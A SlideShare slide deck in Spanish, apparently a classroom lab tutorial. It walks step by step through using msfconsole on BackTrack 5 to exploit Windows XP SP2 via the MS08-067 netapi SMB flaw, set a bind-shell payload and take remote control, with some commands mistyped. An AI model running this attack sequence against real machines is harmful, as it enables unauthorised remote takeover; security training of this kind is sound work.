SlideShare una empresa de Scribd logo
USO DE MFSCONSOLE



Atacar una maquina con windows xp –sp2 desde
Bactrack 5 utilizando msfconsole.
1) Se verifica la IP de la maquina a atacar
2) Se abre una terminal en Backtrack 5. Se verifica la IP pues tienen que
estar en el mismo segmento de red. Se digita “msfconcole” para abrir el
programa.
3) Así debe aparecer cuando ya inicialice el msfconsole.
4) Se hace una búsqueda del exploit a utilizar con la palabra clave “netapi”.
Con el comando : “search netapi”
6)Ya encontrado seleccionamos el exploit con el
comando: “use
exploit/windows/smb/ms08_67_netapi” damos
enter.
7)Verificamos los datos necesarios para atacar la maquina. En
este caso es la IP de la maquina con Wxp-sp2.
8) Se configura el RHOST con el comando: “set rhost
192.168.0.104” esta IP es del equipo Wxp-sp2.
9) Se busca el Payload de la misma forma que se busco el exploit.
Comando: “search payload”. Cuando finalice la búsqueda utilizaremos
especifico con el comando: “set payload windows/shell/bind_tcp” con este
comando ingresaremos a la maquina con Wxp-sp2 por medio del cmd.
10) Se pueden ver las opciones de como esta configurado el
exploit con el comando: “show options” damos enter.
10) Con esto finaliza toda la configuracion del exploit. Solo queda atacar
la maquina con Wxp-sp2 con el comando: “exploit”. Si todo sale bien se
ve como sale en la imagen.
12)Puede utilizar cualquier comando de windows ya se haya tomado control de
la maquina Wxp-sp2 desde msfconsole de tal forma que puede
editar, modificar, eliminar, etc. Cualquier cosa en windows.
En este ejemplo se creo una carpeta llamada “hola” con el comando: “mkdir
hola” ubicado en el directorio : documments and settingsall usersescritorio
GRACIAS.
SOLO DE USO EDUCATIVO.

Más contenido relacionado

PDF
Trabajo final seguridad ofensiva defensiva
PDF
Seguridad: Backtrack2
PDF
Nmap backtrackgblatino pacman_id
PPTX
Comandos de red presentacion
DOCX
Para windows
PDF
Ataque win xp
PDF
Seguridad: Backtrack1_bis
PPTX
Ataque troyano
Trabajo final seguridad ofensiva defensiva
Seguridad: Backtrack2
Nmap backtrackgblatino pacman_id
Comandos de red presentacion
Para windows
Ataque win xp
Seguridad: Backtrack1_bis
Ataque troyano

La actualidad más candente (19)

DOCX
Practica 7
DOCX
practica 7
PDF
Ataque por dns spooging y troyano
PDF
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
DOCX
Practica 7 irdt
DOCX
2 trabajo de nxt.
PPTX
Armitage pruebas
PPTX
PDF
Episodio de pentesting
PDF
Ataque DNS Spoofing
PDF
125524234-bugcon1-pdf
DOCX
Irdt practica 9
DOCX
Práctica 7
PPTX
Como hacer arp spoofing e
PPTX
Computación
PDF
Curso de Metasploit
DOCX
PPTX
Dns spoofing kali linux
Practica 7
practica 7
Ataque por dns spooging y troyano
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Practica 7 irdt
2 trabajo de nxt.
Armitage pruebas
Episodio de pentesting
Ataque DNS Spoofing
125524234-bugcon1-pdf
Irdt practica 9
Práctica 7
Como hacer arp spoofing e
Computación
Curso de Metasploit
Dns spoofing kali linux
Publicidad

Similar a Msfconsole - Explotar a Windows sp2 (11)

PDF
Metasploit
DOCX
Explotación sistema operativo
PDF
Backtrack 5 manual traducido
PDF
Backtrack 5 manual traducido
PDF
Backtrack 5 manual traducido
PDF
Recopilación de Penetration Test Backtrack
PDF
Manual de hacking basico por taskkill#3
PPTX
Escaneo de Puertos
PPTX
HerramientasExplotacion-GRUPO5.pptx
PDF
Juan Garrido - Corporate Forensics: Saca partido a tu arquitectura[RootedCON ...
Metasploit
Explotación sistema operativo
Backtrack 5 manual traducido
Backtrack 5 manual traducido
Backtrack 5 manual traducido
Recopilación de Penetration Test Backtrack
Manual de hacking basico por taskkill#3
Escaneo de Puertos
HerramientasExplotacion-GRUPO5.pptx
Juan Garrido - Corporate Forensics: Saca partido a tu arquitectura[RootedCON ...
Publicidad

Último (20)

PDF
Lección 6 Escuela Sab. A través del mar rojo.pdf
PDF
GUIA DE: CANVA + INTELIGENCIA ARTIFICIAL
PDF
Crear o Morir - Andres Oppenheimer Ccesa007.pdf
PDF
Guia de Tesis y Proyectos de Investigacion FS4 Ccesa007.pdf
PDF
el - LIBRO-PACTO-EDUCATIVO-GLOBAL-OIEC.pdf
PDF
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...
DOCX
2 GRADO UNIDAD 5 - 2025.docx para primaria
PDF
Escuela Sabática 6. A través del Mar Rojo.pdf
PPTX
AGENTES PATÓGENOS Y LAS PRINCIPAL ENFERMEAD.pptx
PDF
Híper Mega Repaso Histológico Bloque 3.pdf
DOCX
Tarea De El Colegio Coding For Kids 1 y 2
PDF
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
PDF
benveniste-problemas-de-linguistica-general-i-cap-6 (1)_compressed.pdf
DOCX
UNIDAD DE APRENDIZAJE 5 AGOSTO tradiciones
PDF
La Evaluacion Formativa en Nuevos Escenarios de Aprendizaje UGEL03 Ccesa007.pdf
DOCX
PROYECTO DE APRENDIZAJE para la semana de fiestas patrias
PDF
Fundamentos_Educacion_a_Distancia_ABC.pdf
PDF
Tomo 1 de biologia gratis ultra plusenmas
DOCX
V UNIDAD - PRIMER GRADO. del mes de agosto
PDF
TRAUMA_Y_RECUPERACION consecuencias de la violencia JUDITH HERMAN
Lección 6 Escuela Sab. A través del mar rojo.pdf
GUIA DE: CANVA + INTELIGENCIA ARTIFICIAL
Crear o Morir - Andres Oppenheimer Ccesa007.pdf
Guia de Tesis y Proyectos de Investigacion FS4 Ccesa007.pdf
el - LIBRO-PACTO-EDUCATIVO-GLOBAL-OIEC.pdf
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...
2 GRADO UNIDAD 5 - 2025.docx para primaria
Escuela Sabática 6. A través del Mar Rojo.pdf
AGENTES PATÓGENOS Y LAS PRINCIPAL ENFERMEAD.pptx
Híper Mega Repaso Histológico Bloque 3.pdf
Tarea De El Colegio Coding For Kids 1 y 2
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
benveniste-problemas-de-linguistica-general-i-cap-6 (1)_compressed.pdf
UNIDAD DE APRENDIZAJE 5 AGOSTO tradiciones
La Evaluacion Formativa en Nuevos Escenarios de Aprendizaje UGEL03 Ccesa007.pdf
PROYECTO DE APRENDIZAJE para la semana de fiestas patrias
Fundamentos_Educacion_a_Distancia_ABC.pdf
Tomo 1 de biologia gratis ultra plusenmas
V UNIDAD - PRIMER GRADO. del mes de agosto
TRAUMA_Y_RECUPERACION consecuencias de la violencia JUDITH HERMAN

Msfconsole - Explotar a Windows sp2

  • 1. USO DE MFSCONSOLE Atacar una maquina con windows xp –sp2 desde Bactrack 5 utilizando msfconsole.
  • 2. 1) Se verifica la IP de la maquina a atacar
  • 3. 2) Se abre una terminal en Backtrack 5. Se verifica la IP pues tienen que estar en el mismo segmento de red. Se digita “msfconcole” para abrir el programa.
  • 4. 3) Así debe aparecer cuando ya inicialice el msfconsole.
  • 5. 4) Se hace una búsqueda del exploit a utilizar con la palabra clave “netapi”. Con el comando : “search netapi”
  • 6. 6)Ya encontrado seleccionamos el exploit con el comando: “use exploit/windows/smb/ms08_67_netapi” damos enter.
  • 7. 7)Verificamos los datos necesarios para atacar la maquina. En este caso es la IP de la maquina con Wxp-sp2.
  • 8. 8) Se configura el RHOST con el comando: “set rhost 192.168.0.104” esta IP es del equipo Wxp-sp2.
  • 9. 9) Se busca el Payload de la misma forma que se busco el exploit. Comando: “search payload”. Cuando finalice la búsqueda utilizaremos especifico con el comando: “set payload windows/shell/bind_tcp” con este comando ingresaremos a la maquina con Wxp-sp2 por medio del cmd.
  • 10. 10) Se pueden ver las opciones de como esta configurado el exploit con el comando: “show options” damos enter.
  • 11. 10) Con esto finaliza toda la configuracion del exploit. Solo queda atacar la maquina con Wxp-sp2 con el comando: “exploit”. Si todo sale bien se ve como sale en la imagen.
  • 12. 12)Puede utilizar cualquier comando de windows ya se haya tomado control de la maquina Wxp-sp2 desde msfconsole de tal forma que puede editar, modificar, eliminar, etc. Cualquier cosa en windows. En este ejemplo se creo una carpeta llamada “hola” con el comando: “mkdir hola” ubicado en el directorio : documments and settingsall usersescritorio
  • 13. GRACIAS. SOLO DE USO EDUCATIVO.